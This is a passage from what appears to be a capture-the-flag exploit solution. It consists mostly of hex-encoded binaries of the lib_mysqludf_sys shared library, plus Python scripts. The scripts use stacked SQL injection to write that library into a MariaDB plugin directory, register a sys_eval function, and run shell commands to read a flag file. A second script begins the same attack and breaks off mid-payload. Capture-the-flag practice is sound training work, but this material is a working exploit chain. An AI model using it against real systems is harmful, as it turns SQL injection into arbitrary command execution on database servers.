680C2000004889E5415453756248833DD00B200000740C488D3D2F0A2000E84AFFFFFF488D1D130A20004C8D25040A2000488B053D0C20004C29E348C1FB034883EB014839D873200F1F4400004883C0014889051D0C200041FF14C4488B05120C20004839D872E5C605FE0B2000015B415CC9C3660F1F84000000000048833DC009200000554889E5741A488B054B0B20004885C0740E488D3DA7092000C9FFE00F1F4000C9C39090554889E54883EC3048897DE8488975E0488955D8488B45E08B0085C07421488D0DE7050000488B45D8BA320000004889CE4889C7E89BFEFFFFC645FF01EB04C645FF000FB645FFC9C3554889E548897DF8C9C3554889E54883EC3048897DF8488975F0488955E848894DE04C8945D84C894DD0488D0DCA050000488B45E8BA1F0000004889CE4889C7E846FEFFFF488B45E048C7001E000000488B45E8C9C3554889E54883EC2048897DF8488975F0488955E8488B45F08B0083F801751C488B45F0488B40088B0085C0750E488B45F8C60001B800000000EB20488D0D83050000488B45E8BA2B0000004889CE4889C7E8DFFDFFFFB801000000C9C3554889E548897DF8C9C3554889E54883EC4048897DE8488975E0488955D848894DD04C8945C84C894DC0488B45E0488B4010488B004889C7E8BBFDFFFF488945F848837DF8007509488B45C8C60001EB16488B45F84889C7E84BFDFFFF4889C2488B45D0488910488B45F8C9C3554889E54883EC2048897DF8488975F0488955E8488B45F08B0083F8027425488D0D05050000488B45E8BA1F0000004889CE4889C7E831FDFFFFB801000000E9AB000000488B45F0488B40088B0085C07422488D0DF2040000488B45E8BA280000004889CE4889C7E8FEFCFFFFB801000000EB7B488B45F0488B40084883C004C70000000000488B45F0488B4018488B10488B45F0488B40184883C008488B00488D04024883C0024889C7E84BFCFFFF4889C2488B45F848895010488B45F8488B40104885C07522488D0DA4040000488B45E8BA1A0000004889CE4889C7E888FCFFFFB801000000EB05B800000000C9C3554889E54883EC1048897DF8488B45F8488B40104885C07410488B45F8488B40104889C7E811FCFFFFC9C3554889E54883EC3048897DE8488975E0488955D848894DD0488B45E8488B4010488945F0488B45E0488B4018488B004883C001480345F0488945F8488B45E0488B4018488B10488B45E0488B4010488B08488B45F04889CE4889C7E8EFFBFFFF488B45E0488B4018488B00480345F0C60000488B45E0488B40184883C008488B10488B45E0488B40104883C008488B08488B45F84889CE4889C7E8B0FBFFFF488B45E0488B40184883C008488B00480345F8C60000488B4DF8488B45F0BA010000004889CE4889C7E892FBFFFF4898C9C3554889E54883EC3048897DE8488975E0488955D8C745FC00000000488B45E08B0083F801751F488B45E0488B40088B55FC48C1E2024801D08B0085C07507B800000000EB20488D0DC2020000488B45D8BA2B0000004889CE4889C7E81EFBFFFFB801000000C9C3554889E548897DF8C9C3554889E54883EC2048897DF8488975F0488955E848894DE0488B45F0488B4010488B004889C7E882FAFFFF4898C9C3554889E54883EC3048897DE8488975E0488955D8C745FC00000000488B45E08B0083F801751F488B45E0488B40088B55FC48C1E2024801D08B0085C07507B800000000EB20488D0D22020000488B45D8BA2B0000004889CE4889C7E87EFAFFFFB801000000C9C3554889E548897DF8C9C3554889E54881EC500400004889BDD8FBFFFF4889B5D0FBFFFF488995C8FBFFFF48898DC0FBFFFF4C8985B8FBFFFF4C898DB0FBFFFFBF01000000E8BEF9FFFF488985C8FBFFFF48C745F000000000488B85D0FBFFFF488B4010488B00488D352C0200004889C7E852FAFFFF488945E8EB63488D85E0FBFFFF4889C7E8BDF9FFFF488945F8488B45F8488B55F04801C2488B85C8FBFFFF4889D64889C7E80CFAFFFF488985C8FBFFFF488D85E0FBFFFF488B55F0488B8DC8FBFFFF4801D1488B55F84889C64889CFE8D1F9FFFF488B45F8480145F0488B55E8488D85E0FBFFFFBE000400004889C7E831F9FFFF4885C07580488B45E84889C7E850F9FFFF488B85C8FBFFFF0FB60084C0740A4883BDC8FBFFFF00750C488B85B8FBFFFFC60001EB2B488B45F0488B95C8FBFFFF488D0402C60000488B85C8FBFFFF4889C7E8FBF8FFFF488B95C0FBFFFF488902488B85C8FBFFFFC9C39090909090909090554889E5534883EC08488B05A80320004883F8FF7419488D1D9B0320000F1F004883EB08FFD0488B034883F8FF75F14883C4085BC9C390904883EC08E84FF9FFFF4883C408C300004E6F20617267756D656E747320616C6C6F77656420287564663A206C69625F6D7973716C7564665F7379735F696E666F29000000000000006C69625F6D7973716C7564665F7379732076657273696F6E20302E302E33000045787065637465642065786163746C79206F6E6520737472696E67207479706520706172616D6574657200000000000045787065637465642065786163746C792074776F20617267756D656E74730000457870656374656420737472696E67207479706520666F72206E616D6520706172616D6574657200436F756C64206E6F7420616C6C6F63617465206D656D6F7279007200011B033B800000000F00000008F9FFFF9C00000051F9FFFFBC0000005BF9FFFFDC000000A7F9FFFFFC00000004FAFFFF1C0100000EFAFFFF3C01000071FAFFFF5C01000062FBFFFF7C0100008DFBFFFF9C0100005EFCFFFFBC010000C5FCFFFFDC010000CFFCFFFFFC010000FEFCFFFF1C02000065FDFFFF3C0200006FFDFFFF5C0200001400000000000000017A5200017810011B0C0708900100001C0000001C00000064F8FFFF4900000000410E108602430D0602440C070800001C0000003C0000008DF8FFFF0A00000000410E108602430D06450C07080000001C0000005C00000077F8FFFF4C00000000410E108602430D0602470C070800001C0000007C000000A3F8FFFF5D00000000410E108602430D0602580C070800001C0000009C000000E0F8FFFF0A00000000410E108602430D06450C07080000001C000000BC000000CAF8FFFF6300000000410E108602430D06025E0C070800001C000000DC0000000DF9FFFFF100000000410E108602430D0602EC0C070800001C000000FC000000DEF9FFFF2B00000000410E108602430D06660C07080000001C0000001C010000E9F9FFFFD100000000410E108602430D0602CC0C070800001C0000003C0100009AFAFFFF6700000000410E108602430D0602620C070800001C0000005C010000E1FAFFFF0A00000000410E108602430D06450C07080000001C0000007C010000CBFAFFFF2F00000000410E108602430D066A0C07080000001C0000009C010000DAFAFFFF6700000000410E108602430D0602620C070800001C000000BC01000021FBFFFF0A00000000410E108602430D06450C07080000001C000000DC0100000BFBFFFF5501000000410E108602430D060350010C0708000000000000000000FFFFFFFFFFFFFFFF0000000000000000FFFFFFFFFFFFFFFF00000000000000000000000000000000F01420000000000001000000000000006F010000000000000C0000000000000088090000000000000D000000000000004811000000000000F5FEFF6F00000000B8010000000000000500000000000000E805000000000000060000000000000070020000000000000A000000000000009D010000000000000B000000000000001800000000000000030000000000000090162000000000000200000000000000380100000000000014000000000000000700000000000000170000000000000050080000000000000700000000000000F0070000000000000800000000000000600000000000000009000000000000001800000000000000FEFFFF6F00000000D007000000000000FFFFFF6F000000000100000000000000F0FFFF6F000000008607000000000000F9FFFF6F0000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000F81420000000000000000000000000000000000000000000B609000000000000C609000000000000D609000000000000E609000000000000F609000000000000060A000000000000160A000000000000260A000000000000360A000000000000460A000000000000560A000000000000660A000000000000760A0000000000004743433A2028474E552920342E342E3720323031323033313320285265642048617420342E342E372D3429004743433A2028474E552920342E342E3720323031323033313320285265642048617420342E342E372D31372900002E73796D746162002E737472746162002E7368737472746162002E6E6F74652E676E752E6275696C642D6964002E676E752E68617368002E64796E73796D002E64796E737472002E676E752E76657273696F6E002E676E752E76657273696F6E5F72002E72656C612E64796E002E72656C612E706C74002E696E6974002E74657874002E66696E69002E726F64617461002E65685F6672616D655F686472002E65685F6672616D65002E63746F7273002E64746F7273002E6A6372002E646174612E72656C2E726F002E64796E616D6963002E676F74002E676F742E706C74002E627373002E636F6D6D656E7400000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001B0000000700000002000000000000009001000000000000900100000000000024000000000000000000000000000000040000000000000000000000000000002E000000F6FFFF6F0200000000000000B801000000000000B801000000000000B400000000000000030000000000000008000000000000000000000000000000380000000B000000020000000000000070020000000000007002000000000000780300000000000004000000020000000800000000000000180000000000000040000000030000000200000000000000E805000000000000E8050000000000009D0100000000000000000000000000000100000000000000000000000000000048000000FFFFFF6F0200000000000000860700000000000086070000000000004A0000000000000003000000000000000200000000000000020000000000000055000000FEFFFF6F0200000000000000D007000000000000D007000000000000200000000000000004000000010000000800000000000000000000000000000064000000040000000200000000000000F007000000000000F00700000000000060000000000000000300000000000000080000000000000018000000000000006E000000040000000200000000000000500800000000000050080000000000003801000000000000030000000A000000080000000000000018000000000000007800000001000000060000000000000088090000000000008809000000000000180000000000000000000000000000000400000000000000000000000000000073000000010000000600000000000000A009000000000000A009000000000000E0000000000000000000000000000000040000000000000010000000000000007E000000010000000600000000000000800A000000000000800A000000000000C80600000000000000000000000000001000000000000000000000000000000084000000010000000600000000000000481100000000000048110000000000000E000000000000000000000000000000040000000000000000000000000000008A00000001000000020000000000000058110000000000005811000000000000EC0000000000000000000000000000000800000000000000000000000000000092000000010000000200000000000000441200000000000044120000000000008400000000000000000000000000000004000000000000000000000000000000A0000000010000000200000000000000C812000000000000C812000000000000FC01000000000000000000000000000008000000000000000000000000000000AA000000010000000300000000000000C814200000000000C8140000000000001000000000000000000000000000000008000000000000000000000000000000B1000000010000000300000000000000D814200000000000D8140000000000001000000000000000000000000000000008000000000000000000000000000000B8000000010000000300000000000000E814200000000000E8140000000000000800000000000000000000000000000008000000000000000000000000000000BD000000010000000300000000000000F014200000000000F0140000000000000800000000000000000000000000000008000000000000000000000000000000CA000000060000000300000000000000F814200000000000F8140000000000008001000000000000040000000000000008000000000000001000000000000000D3000000010000000300000000000000781620000000000078160000000000001800000000000000000000000000000008000000000000000800000000000000D8000000010000000300000000000000901620000000000090160000000000008000000000000000000000000000000008000000000000000800000000000000E1000000080000000300000000000000101720000000000010170000000000001000000000000000000000000000000008000000000000000000000000000000E60000000100000030000000000000000000000000000000101700000000000059000000000000000000000000000000010000000000000001000000000000001100000003000000000000000000000000000000000000006917000000000000EF00000000000000000000000000000001000000000000000000000000000000010000000200000000000000000000000000000000000000581F00000000000068070000000000001B0000002C00000008000000000000001800000000000000090000000300000000000000000000000000000000000000C02600000000000042030000000000000000000000000000010000000000000000000000000000000000000000000000000000000000000000000000000000000000000003000100900100000000000000000000000000000000000003000200B80100000000000000000000000000000000000003000300700200000000000000000000000000000000000003000400E80500000000000000000000000000000000000003000500860700000000000000000000000000000000000003000600D00700000000000000000000000000000000000003000700F00700000000000000000000000000000000000003000800500800000000000000000000000000000000000003000900880900000000000000000000000000000000000003000A00A00900000000000000000000000000000000000003000B00800A00000000000000000000000000000000000003000C00481100000000000000000000000000000000000003000D00581100000000000000000000000000000000000003000E00441200000000000000000000000000000000000003000F00C81200000000000000000000000000000000000003001000C81420000000000000000000000000000000000003001100D81420000000000000000000000000000000000003001200E81420000000000000000000000000000000000003001300F01420000000000000000000000000000000000003001400F81420000000000000000000000000000000000003001500781620000000000000000000000000000000000003001600901620000000000000000000000000000000000003001700101720000000000000000000000000000000000003001800000000000000000000000000000000000100000002000B00800A0000000000000000000000000000110000000400F1FF000000000000000000000000000000001C00000001001000C81420000000000000000000000000002A00000001001100D81420000000000000000000000000003800000001001200E81420000000000000000000000000004500000002000B00A00A00000000000000000000000000005B00000001001700101720000000000001000000000000006A00000001001700181720000000000008000000000000007800000002000B00200B0000000000000000000000000000110000000400F1FF000000000000000000000000000000008400000001001000D01420000000000000000000000000009100000001000F00C01400000000000000000000000000009F00000001001200E8142000000000000000000000000000AB00000002000B0010110000000000000000000000000000C10000000400F1FF00000000000000000000000000000000D40000000100F1FF90162000000000000000000000000000EA00000001001300F0142000000000000000000000000000F700000001001100E0142000000000000000000000000000040100000100F1FFF81420000000000000000000000000000D01000012000B00D10D000000000000D1000000000000001501000012000B00130F0000000000002F000000000000001E01000020000000000000000000000000000000000000002D01000020000000000000000000000000000000000000004101000012000C00481100000000000000000000000000004701000012000B00A90F0000000000000A000000000000005701000012000000000000000000000000000000000000006B01000012000000000000000000000000000000000000007F01000012000B00A20E00000000000067000000000000008D01000012000B00B30F0000000000005501000000000000960100001200000000000000000000000000000000000000A901000012000B00950B0000000000000A00000000000000C601000012000B00B50C000000000000F100000000000000D30100001200000000000000000000000000000000000000E50100001200000000000000000000000000000000000000F901000012000000000000000000000000000000000000000D02000012000B004C0B00000000000049000000000000002802000022000000000000000000000000000000000000004402000012000B00A60D0000000000002B000000000000005302000012000B00EB0B0000000000005D000000000000006002000012000B00480C0000000000000A000000000000006F02000012000000000000000000000000000000000000008302000012000B00420F0000000000006700000000000000910200001200000000000000000000000000000000000000A50200001200000000000000000000000000000000000000B902000012000B00520C0000000000006300000000000000C10200001000F1FF10172000000000000000000000000000CD02000012000B009F0B0000000000004C00000000000000E30200001000F1FF20172000000000000000000000000000E80200001200000000000000000000000000000000000000FD02000012000B00090F0000000000000A000000000000000D0300001200000000000000000000000000000000000000220300001000F1FF101720000000000000000000000000002903000012000000000000000000000000000000000000003C03000012000900880900000000000000000000000000000063616C6C5F676D6F6E5F73746172740063727473747566662E63005F5F43544F525F4C4953545F5F005F5F44544F525F4C4953545F5F005F5F4A43525F4C4953545F5F005F5F646F5F676C6F62616C5F64746F72735F61757800636F6D706C657465642E363335320064746F725F6964782E36333534006672616D655F64756D6D79005F5F43544F525F454E445F5F005F5F4652414D455F454E445F5F005F5F4A43525F454E445F5F005F5F646F5F676C6F62616C5F63746F72735F617578006C69625F6D7973716C7564665F7379732E63005F474C4F42414C5F4F46465345545F5441424C455F005F5F64736F5F68616E646C65005F5F44544F525F454E445F5F005F44594E414D4943007379735F736574007379735F65786563005F5F676D6F6E5F73746172745F5F005F4A765F5265676973746572436C6173736573005F66696E69007379735F6576616C5F6465696E6974006D616C6C6F634040474C4942435F322E322E350073797374656D4040474C4942435F322E322E35007379735F657865635F696E6974007379735F6576616C0066676574734040474C4942435F322E322E35006C69625F6D7973716C7564665F7379735F696E666F5F6465696E6974007379735F7365745F696E697400667265654040474C4942435F322E322E35007374726C656E4040474C4942435F322E322E350070636C6F73654040474C4942435F322E322E35006C69625F6D7973716C7564665F7379735F696E666F5F696E6974005F5F6378615F66696E616C697A654040474C4942435F322E322E35007379735F7365745F6465696E6974007379735F6765745F696E6974007379735F6765745F6465696E6974006D656D6370794040474C4942435F322E322E35007379735F6576616C5F696E697400736574656E764040474C4942435F322E322E3500676574656E764040474C4942435F322E322E35007379735F676574005F5F6273735F7374617274006C69625F6D7973716C7564665F7379735F696E666F005F656E64007374726E6370794040474C4942435F322E322E35007379735F657865635F6465696E6974007265616C6C6F634040474C4942435F322E322E35005F656461746100706F70656E4040474C4942435F322E322E35005F696E697400"
for i in range(0,21510, 5000):
    end = i + 5000
    payload.append(udf[i:end])

p = dict(zip(text, payload))

for t in text:
    url = base_url+"?id=';select unhex('{}') into dumpfile '/usr/lib/mariadb/plugin/{}.txt'--+&page=1&limit=10".format(p[t], t)
    r = requests.get(url)
    print(r.status_code)

next_url = base_url+"?id=';select concat(load_file('/usr/lib/mariadb/plugin/a.txt'),load_file('/usr/lib/mariadb/plugin/b.txt'),load_file('/usr/lib/mariadb/plugin/c.txt'),load_file('/usr/lib/mariadb/plugin/d.txt'),load_file('/usr/lib/mariadb/plugin/e.txt')) into dumpfile '/usr/lib/mariadb/plugin/udf.so'--+&page=1&limit=10"
rn = requests.get(next_url)

uaf_url=base_url+"?id=';CREATE FUNCTION sys_eval RETURNS STRING SONAME 'udf.so';--+"#导入udf函数
r=requests.get(uaf_url)
nn_url = base_url+"?id=';select sys_eval('cat /flag.*');--+&page=1&limit=10"
rnn = requests.get(nn_url)
print(rnn.text)

import requests

url = 'http://c4cfac67-eec1-4378-ac1b-75c52840f816.challenge.ctf.show:8080/api/?id='
code = '7F454C4602010100000000000000000003003E0001000000800A000000000000400000000000000058180000000000000000000040003800060040001C0019000100000005000000000000000000000000000000000000000000000000000000C414000000000000C41400000000000000002000000000000100000006000000C814000000000000C814200000000000C8142000000000004802000000000000580200000000000000002000000000000200000006000000F814000000000000F814200000000000F814200000000000800100000000000080010000000000000800000000000000040000000400000090010000000000009001000000000000900100000000000024000000000000002400000000000000040000000000000050E574640400000044120000000000004412000000000000441200000000000084000000000000008400000000000000040000000000000051E5746406000000000000000000000000000000000000000000000000000000000000000000000000000000000000000800000000000000040000001400000003000000474E5500D7FF1D94176ABA0C150B4F3694D2EC995AE8E1A8000000001100000011000000020000000700000080080248811944C91CA44003980468831100000013000000140000001600000017000000190000001C0000001E000000000000001F00000000000000200000002100000022000000230000002400000000000000CE2CC0BA673C7690EBD3EF0E78722788B98DF10ED971581CA868BE12BBE3927C7E8B92CD1E7066A9C3F9BFBA745BB073371974EC4345D5ECC5A62C1CC3138AFF3B9FD4A0AD73D1C50B5911FEAB5FBE1200000000000000000000000000000000000000000000000000000000000000000300090088090000000000000000000000000000010000002000000000000000000000000000000000000000250000002000000000000000000000000000000000000000CD00000012000000000000000000000000000000000000001E0100001200000000000000000000000000000000000000620100001200000000000000000000000000000000000000E30000001200000000000000000000000000000000000000B90000001200000000000000000000000000000000000000680100001200000000000000000000000000000000000000160000002200000000000000000000000000000000000000540000001200000000000000000000000000000000000000F00000001200000000000000000000000000000000000000B200000012000000000000000000000000000000000000005A01000012000000000000000000000000000000000000005201000012000000000000000000000000000000000000004C0100001200000000000000000000000000000000000000E800000012000B00D10D000000000000D1000000000000003301000012000B00A90F0000000000000A000000000000001000000012000C00481100000000000000000000000000007800000012000B009F0B0000000000004C00000000000000FF0000001200090088090000000000000000000000000000800100001000F1FF101720000000000000000000000000001501000012000B00130F0000000000002F000000000000008C0100001000F1FF201720000000000000000000000000009B00000012000B00480C0000000000000A000000000000002501000012000B00420F0000000000006700000000000000AA00000012000B00520C00000000000063000000000000005B00000012000B00950B0000000000000A000000000000008E00000012000B00EB0B0000000000005D00000000000000790100001000F1FF101720000000000000000000000000000501000012000B00090F0000000000000A00000000000000C000000012000B00B50C000000000000F100000000000000F700000012000B00A20E00000000000067000000000000003900000012000B004C0B0000000000004900000000000000D400000012000B00A60D0000000000002B000000000000004301000012000B00B30F0000000000005501000000000000005F5F676D6F6E5F73746172745F5F005F66696E69005F5F6378615F66696E616C697A65005F4A765F5265676973746572436C6173736573006C69625F6D7973716C7564665F7379735F696E666F5F696E6974006D656D637079006C69625F6D7973716C7564665F7379735F696E666F5F6465696E6974006C69625F6D7973716C7564665F7379735F696E666F007379735F6765745F696E6974007379735F6765745F6465696E6974007379735F67657400676574656E76007374726C656E007379735F7365745F696E6974006D616C6C6F63007379735F7365745F6465696E69740066726565007379735F73657400736574656E76007379735F657865635F696E6974007379735F657865635F6465696E6974007379735F657865630073797374656D007379735F6576616C5F696E6974007379735F6576616C5F6465696E6974007379735F6576616C00706F70656E007265616C6C6F63007374726E6370790066676574730070636C6F7365006C6962632E736F2E36005F6564617461005F5F6273735F7374617274005F656E6400474C4942435F322E322E3500000000000000000000020002000200020002000200020002000200020002000200020001000100010001000100010001000100010001000100010001000100010001000100010001000100010001006F0100001000000000000000751A6909000002009101000000000000F0142000000000000800000000000000F0142000000000007816200000000000060000000200000000000000000000008016200000000000060000000300000000000000000000008816200000000000060000000A0000000000000000000000A81620000000000007000000040000000000000000000000B01620000000000007000000050000000000000000000000B81620000000000007000000060000000000000000000000C01620000000000007000000070000000000000000000000C81620000000000007000000080000000000000000000000D01620000000000007000000090000000000000000000000D816200000000000070000000A0000000000000000000000E016200000000000070000000B0000000000000000000000E816200000000000070000000C0000000000000000000000F016200000000000070000000D0000000000000000000000F816200000000000070000000E00000000000000000000000017200000000000070000000F00000000000000000000000817200000000000070000001000000000000000000000004883EC08E8EF000000E88A010000E8750700004883C408C3FF35F20C2000FF25F40C20000F1F4000FF25F20C20006800000000E9E0FFFFFFFF25EA0C20006801000000E9D0FFFFFFFF25E20C20006802000000E9C0FFFFFFFF25DA0C20006803000000E9B0FFFFFFFF25D20C20006804000000E9A0FFFFFFFF25CA0C20006805000000E990FFFFFFFF25C20C20006806000000E980FFFFFFFF25BA0C20006807000000E970FFFFFFFF25B20C20006808000000E960FFFFFFFF25AA0C20006809000000E950FFFFFFFF25A20C2000680A000000E940FFFFFFFF259A0C2000680B000000E930FFFFFFFF25920C2000680C000000E920FFFFFF4883EC08488B05ED0B20004885C07402FFD04883C408C390909090909090909055803D680C2000004889E5415453756248833DD00B200000740C488D3D2F0A2000E84AFFFFFF488D1D130A20004C8D25040A2000488B053D0C20004C29E348C1FB034883EB014839D873200F1F4400004883C0014889051D0C200041FF14C4488B05120C20004839D872E5C605FE0B2000015B415CC9C3660F1F84000000000048833DC009200000554889E5741A488B054B0B20004885C0740E488D3DA7092000C9FFE00F1F4000C9C39090554889E54883EC3048897DE8488975E0488955D8488B45E08B0085C07421488D0DE7050000488B45D8BA320000004889CE4889C7E89BFEFFFFC645FF01EB04C645FF000FB645FFC9C3554889E548897DF8C9C3554889E54883EC3048897DF8488975F0488955E848894DE04C8945D84C894DD0488D0DCA050000488B45E8BA1F0000004889CE4889C7E846FEFFFF488B45E048C7001E000000488B45E8C9C3554889E54883EC2048897DF8488975F0488955E8488B45F08B0083F801751C488B45F0488B40088B0085C0750E488B45F8C60001B800000000EB20488D0D83050000488B45E8BA2B0000004889CE4889C7E8DFFDFFFFB801000000C9C3554889E548897DF8C9C3554889E54883EC4048897DE8488975E0488955D848894DD04C8945C84C894DC0488B45E0488B4010488B004889C7E8BBFDFFFF488945F848837DF8007509488B45C8C60001EB16488B45F84889C7E84BFDFFFF4889C2488B45D0488910488B45F8C9C3554889E54883EC2048897DF8488975F0488955E8488B45F08B0083F8027425488D0D05050000488B45E8BA1F0000004889CE4889C7E831FDFFFFB801000000E9AB000000488B45F0488B40088B0085C07422488D0DF2040000488B45E8BA280000004889CE4889C7E8FEFCFFFFB801000000EB7B488B45F0488B40084883C004C70000000000488B45F0488B4018488B10488B45F0488B40184883C008488B00488D04024883C0024889C7E84BFCFFFF4889C2488B45F848895010488B45F8488B40104885C07522488D0DA4040000488B45E8BA1A0000004889CE4889C7E888FCFFFFB801000000EB05B800000000C9C3554889E54883EC1048897DF8488B45F8488B40104885C07410488B45F8488B40104889C7E811FCFFFFC9C3554889E54883EC3048897DE8488975E0488955D848894DD0488B45E8488B4010488945F0488B45E0488B4018488B004883C001480345F0488945F8488B45E0488B4018488B10488B45E0488B4010488B08488B45F04889CE4889C7E8EFFBFFFF488B45E0488B4018488B00480345F0C60000488B45E0488B40184883C008488B10488B45E0488B40104883C008488B08488B45F84889CE4889C7E8B0FBFFFF488B45E0488B40184883C008488B00480345F8C60000488B4DF8488B45F0BA010000004889CE4889C7E892FBFFFF4898C9C3554889E54883EC3048897DE8488975E0488955D8C745FC00000000488B45E08B0083F801751F488B45E0488B40088B55FC48C1E2024801D08B0085C07507B800000000EB20488D0DC2020000488B45D8BA2B0000004889CE4889C7E81EFBFFFFB801000000C9C3554889E548897DF8C9C3554889E54883EC2048897DF8488975F0488955E848894DE0488B45F0488B4010488B004889C7E882FAFFFF4898C9C3554889E54883EC3048897DE8488975E0488955D8C745FC00000000488B45E08B0083F801751F488B45E0488B40088B55FC48C1E2024801D08B0085C07507B800000000EB20488D0D22020000488B45D8BA2B0000004889CE4889C7E87EFAFFFFB801000000C9C3554889E548897DF8C9C3554889E54881EC500400004889BDD8FBFFFF4889B5D0FBFFFF488995C8FBFFFF48898DC0FBFFFF4C8985B8FBFFFF4C898DB0FBFFFFBF01000000E8BEF9FFFF488985C8FBFFFF48C745F000000000488B85D0FBFFFF488B4010488B00488D352C0200004889C7E852FAFFFF488945E8EB63488D85E0FBFFFF4889C7E8BDF9FFFF488945F8488B45F8488B55F04801C2488B85C8FBFFFF4889D64889C7E80CFAFFFF488985C8FBFFFF488D85E0FBFFFF488B55F0488B8DC8FBFFFF4801D1488B55F84889C64889CFE8D1F9FFFF488B45F8480145F0488B55E8488D85E0FBFFFFBE000400004889C7E831F9FFFF4885C07580488B45E84889C7E850F9FFFF488B85C8FBFFFF0FB60084C0740A4883BDC8FBFFFF00750C488B85B8FBFFFFC60001EB2B488B45F0488B95C8FBFFFF488D0402C60000488B85C8FBFFFF4889C7E8FBF8FFFF488B95C0FBFFFF488902488B85C8FBFFFFC9C39090909090909090554889E5534883EC08488B05A80320004883F8FF7419488D1D9B0320000F1F004883EB08FFD0488B034883F8FF75F14883C4085BC9C390904883EC08E84FF9FFFF4883C408C300004E6F20617267756D656E747320616C6C6F77656420287564663A206C69625F6D7973716C7564665F7379735F696E666F29000000000000006C69625F6D7973716C7564665F7379732076657273696F6E20302E302E33000045787065637465642065786163746C79206F6E6520737472696E67207479706520706172616D6574657200000000000045787065637465642065786163746C792074776F20617267756D656E74730000457870656374656420737472696E67207479706520666F72206E616D6520706172616D6574657200436F756C64206E6F7420616C6C6F63617465206D656D6F7279007200011B033B800000000F00000008F9FFFF9C00000051F9FFFFBC0000005BF9FFFFDC000000A7F9FFFFFC00000004FAFFFF1C0100000EFAFFFF3C01000071FAFFFF5C01000062FBFFFF7C0100008DFBFFFF9C0100005EFCFFFFBC010000C5FCFFFFDC010000CFFCFFFFFC010000FEFCFFFF1C02000065FDFFFF3C0200006FFDFFFF5C0200001400000000000000017A5200017810011B0C0708900100001C0000001C00000064F8FFFF4900000000410E108602430D0602440C070800001C0000003C0000008DF8FFFF0A00000000410E108602430D06450C07080000001C0000005C00000077F8FFFF4C00000000410E108602430D0602470C070800001C0000007C000000A3F8FFFF5D00000000410E108602430D0602580C070800001C0000009C000000E0F8FFFF0A00000000410E108602430D06450C07080000001C000000BC000000CAF8FFFF6300000000410E108602430D06025E0C070800001C000000DC0000000DF9FFFFF100000000410E108602430D0602EC0C070800001C000000FC000000DEF9FFFF2B00000000410E108602430D06660C07080000001C0000001C010000E9F9FFFFD100000000410E108602430D0602CC0C070800001C0000003C0100009AFAFFFF6700000000410E108602430D0602620C070800001C0000005C010000E1FAFFFF0A00000000410E108602430D06450C07080000001C0000007C010000CBFAFFFF2F00000000410E108602430D066A0C07080000001C0000009C010000DAFAFFFF6700000000410E108602430D0602620C070800001C000000BC01000021FBFFFF0A00000000410E108602430D06450C07080000001C000000DC0100000BFBFFFF5501000000410E108602430D060350010C0708000000000000000000FFFFFFFFFFFFFFFF0000000000000000FFFFFFFFFFFFFFFF00000000000000000000000000000000F01420000000000001000000000000006F010000000000000C0000000000000088090000000000000D000000000000004811000000000000F5FEFF6F00000000B8010000000000000500000000000000E805000000000000060000000000000070020000000000000A000000000000009D010000000000000B000000000000001800000000000000030000000000000090162000000000000200000000000000380100000000000014000000000000000700000000000000170000000000000050080000000000000700000000000000F0070000000000000800000000000000600000000000000009000000000000001800000000000000FEFFFF6F00000000D007000000000000FFFFFF6F000000000100000000000000F0FFFF6F000000008607000000000000F9FFFF6F0000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000F81420000000000000000000000000000000000000000000B609000000000000C609000000000000D609000000000000E609000000000000F609000000000000060A000000000000160A000000000000260A000000000000360A000000000000460A000000000000560A000000000000660A000000000000760A0000000000004743433A2028474E552920342E342E3720323031323033313320285265642048617420342E342E372D3429004743433A2028474E552920342E342E3720323031323033313320285265642048617420342E342E372D31372900002E73796D746162002E737472746162002E7368737472746162002E6E6F74652E676E752E6275696C642D6964002E676E752E68617368002E64796E73796D002E64796E737472002E676E752E76657273696F6E002E676E752E76657273696F6E5F72002E72656C612E64796E002E72656C612E706C74002E696E6974002E74657874002E66696E69002E726F64617461002E65685F6672616D655F686472002E65685F6672616D65002E63746F7273002E64746F7273002E6A6372002E646174612E72656C2E726F002E64796E616D6963002E676F74002E676F742E706C74002E627373002E636F6D6D656E7400000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001B0000000700000002000000000000009001000000000000900100000000000024000000000000000000000000000000040000000000000000000000000000002E000000F6FFFF6F0200000000000000B801000000000000B801000000000000B400000000000000030000000000000008000000000000000000000000000000380000000B000000020000000000000070020000000000007002000000000000780300000000000004000000020000000800000000000000180000000000000040000000030000000200000000000000E805000000000000E8050000000000009D0100000000000000000000000000000100000000000000000000000000000048000000FFFFFF6F0200000000000000860700000000000086070000000000004A0000000000000003000000000000000200000000000000020000000000000055000000FEFFFF6F0200000000000000D007000000000000D007000000000000200000000000000004000000010000000800000000000000000000000000000064000000040000000200000000000000F007000000000000F00700000000000060000000000000000300000000000000080000000000000018000000000000006E000000040000000200000000000000500800000000000050080000000000003801000000000000030000000A000000080000000000000018000000000000007800000001000000060000000000000088090000000000008809000000000000180000000000000000000000000000000400000000000000000000000000000073000000010000000600000000000000A009000000000000A009000000000000E0000000000000000000000000000000040000000000000010000000000000007E000000010000000600000000000000800A000000000000800A000000000000C80600000000000000000000000000001000000000000000000000000000000084000000010000000600000000000000481100000000000048110000000000000E000000000000000000000000000000040000000000000000000000000000008A00000001000000020000000000000058110000000000005811000000000000EC0000000000000000000000000000000800000000000000000000000000000092000000010000000200000000000000441200000000000044120000000000008400000000000000000000000000000004000000000000000000000000000000A0000000010000000200000000000000C812000000000000C812000000000000FC01000000000000000000000000000008000000000000000000000000000000AA000000010000000300000000000000C814200000000000C8140000000000001000000000000000000000000000000008000000000000000000000000000000B1000000010000000300000000000000D814200000000000D8140000000000001000000000000000000000000000000008000000000000000000000000000000B8000000010000000300000000000000E814200000000000E8140000000000000800000000000000000000000000000008000000000000000000000000000000BD000000010000000300000000000000F014200000000000F0140000000000000800000000000000000000000000000008000000000000000000000000000000CA000000060000000300000000000000F814200000000000F8140000000000008001000000000000040000000000000008000000000000001000000000000000D3000000010000000300000000000000781620000000000078160000000000001800000000000000000000000000000008000000000000000800000000000000D8000000010000000300000000000000901620000000000090160000000000008000000000000000000000000000000008000000000000000800000000000000E1000000080000000300000000000000101720000000000010170000000000001000000000000000000000000000000008000000000000000000000000000000E60000000100000030000000000000000000000000000000101700000000000059000000000000000000000000000000010000000000000001000000000000001100000003000000000000000000000000000000000000006917000000000000EF00000000000000000000000